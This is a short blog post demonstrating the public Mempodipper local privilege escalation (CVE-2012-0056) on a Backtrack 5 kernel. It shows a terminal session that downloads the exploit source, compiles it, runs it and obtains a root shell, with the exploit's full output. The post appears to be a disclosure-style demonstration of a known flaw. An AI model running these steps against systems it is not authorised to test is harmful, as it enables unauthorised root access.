Backtrack 5 kernel whoops !!


Hackers For Charity

If you run Backtrack 5 r1 as a non-root user, and apparently many other kernels of linux >=2.6.39 can be exploited to get root via a Linux Local Privilege Escalation via SUID /proc/pid/mem Write. Read more from blog http://blog.zx2c4.com Exploit code can be obtained here href=”http://www.exploit-db.com/exploits/18411/

chalo@bt:~$ uname -a
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
chalo@bt:~$ wget -c http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
chalo@bt:~$ gcc -o sploit mempodipper.c
chalo@bt:~$ ./sploit
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12634/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x8049a30.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a24.
[+] Executing su with shellcode.
sh-4.1# whoami
root

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

3 Responses to Backtrack 5 kernel whoops !!

  1. G1 says:

    Hey – I noticed your posting. I created a proof of concept video on this.

  2. Aircrack Ng says:

    great video johnny ..thanks

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s